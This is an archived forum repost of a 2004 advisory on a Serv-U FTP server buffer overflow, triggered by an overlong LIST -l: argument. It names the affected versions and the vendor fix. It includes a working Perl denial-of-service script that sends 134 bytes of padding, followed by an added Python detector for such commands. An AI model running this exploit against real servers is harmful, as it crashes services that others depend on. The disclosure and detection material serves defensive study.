Full Version: Serv-u List -l Parameter Buffer Overflow
GovernmentSecurity.org > The Archives > Exploit Articles
alexsen
May 3 2004, 05:43 PM

Serv-U LIST -l Parameter Buffer Overflow
------------------------------------------------------------------------


Article reference:
http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html




SUMMARY

Serv-U (http://www.serv-u.com/) is a "powerful, easy-to-use, award-winning FTP
server" created by Rob Beckers.
A vulnerability in the product allows a remote user to cause the server to
fail by sending a malformed LIST command to the server.

DETAILS

Vulnerable Systems:
* Serv-U older than 5.0.0.6

Immune Systems:
* Serv-U 5.0.0.6 and newer

A user who issues a LIST command with a long value (around 134 bytes) for its
-l: parameter can cause the server to try to read a value outside Serv-U's
memory. This triggers an unhandled exception, which in turn causes the
program to crash.

Solution:
The vendor has released a new version, which fixes this problem.

Exploit:
#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
    PeerAddr => $host,
    PeerPort => "2116",
   );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
 last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
 last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
 last;
}
}

$ftp = join("", "LIST -l:", "A" x 134, "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
 last;
}
}

close $remote;
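
A defensive check for the condition described in the advisory above, as an added example that is not part of the original post or the advisory: it scans FTP control-channel lines for LIST commands whose -l: argument is unusually long. The 64-byte limit, the function name and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed threshold: the advisory reports a crash at around 134 bytes, so a
# limit well below that still leaves room for legitimate arguments.
MAX_L_ARG = 64

# FTP command names are case-insensitive (RFC 959). The argument is taken as
# the rest of the line so that embedded spaces cannot hide its real length.
LIST_L = re.compile(rb"^\s*LIST\s+-l:(?P<arg>.*)$", re.IGNORECASE)


def suspicious_list_commands(lines, max_len=MAX_L_ARG):
    """Return (line_number, arg_length) for each LIST -l: argument over max_len."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        match = LIST_L.match(raw.rstrip(b"\r\n"))
        if match and len(match.group("arg")) > max_len:
            hits.append((number, len(match.group("arg"))))
    return hits


# Constructed client-to-server control-channel lines (not a real capture).
SAMPLE = [
    b"USER anonymous\r\n",
    b"PASS a@b.com\r\n",
    b"LIST -l\r\n",                        # plain option, no -l: value
    b"LIST -l:pub\r\n",                    # short value, not flagged
    b"list -l:" + b"A" * 134 + b"\r\n",    # length reported in the advisory
]

if __name__ == "__main__":
    for number, length in suspicious_list_commands(SAMPLE):
        print(f"line {number}: LIST -l: argument of {length} bytes")
```

The same length test can be applied to FTP server logs or to reassembled control-channel traffic on servers that have not yet been upgraded to 5.0.0.6 or newer.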